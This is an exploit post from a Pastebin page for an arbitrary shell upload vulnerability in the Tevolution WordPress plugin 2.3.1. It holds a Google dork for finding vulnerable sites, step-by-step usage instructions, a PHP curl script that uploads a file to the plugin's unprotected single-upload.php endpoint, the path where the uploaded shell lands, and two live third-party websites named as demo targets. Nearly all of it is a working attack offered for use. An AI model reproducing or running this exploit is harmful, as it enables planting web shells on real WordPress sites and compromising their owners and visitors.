Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################
- # Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
- # Exploit Author : xBADGIRL21
- # Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
- # Vendor Homepage : https://templatic.com/
- # version : 2.3.1
- # Tested on: [ BackBox ]
- # skype:xbadgirl21
- # Date: 15/08/2016
- # video Proof : https://youtu.be/eVjW6rnaoSY
- ######################
- # [+] DESCRIPTION :
- ######################
- # [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
- # [+] Some of the features it enables include custom post types, monetization options, custom fieldsa|
- # [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
- # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
- ######################
- # [+] USAGE :
- ######################
- # 1.- Download or Copy the Exploit C0des
- # 2.- Use Dork and Choose One Of the Website
- # 3.- Edit The Script
- # 4.- Upload Your File : shell.php.jpg or shell.php.txt
- ######################
- # [+] Exploit:
- ######################
- <?php
- $uploadfile="roy.php.txt";
- $ch = curl_init("
- http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
- ");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('file'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- ######################
- # [+] Dev!l Path :
- ######################
- #
- http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/roy.php.txt
- ######################
- # [+] Live Demo :
- ######################
- # http://guiagronicaragua.com
- # http://eventsinsuriname.com
- ######################
- # Discovered by : xBADGIRL21 - Unkn0wN
- # Greetz : All Mauritanien Hackers - NoWhere
- #######################
- ### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't
- # so I Just Write the Exploit C0des ...........
- #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement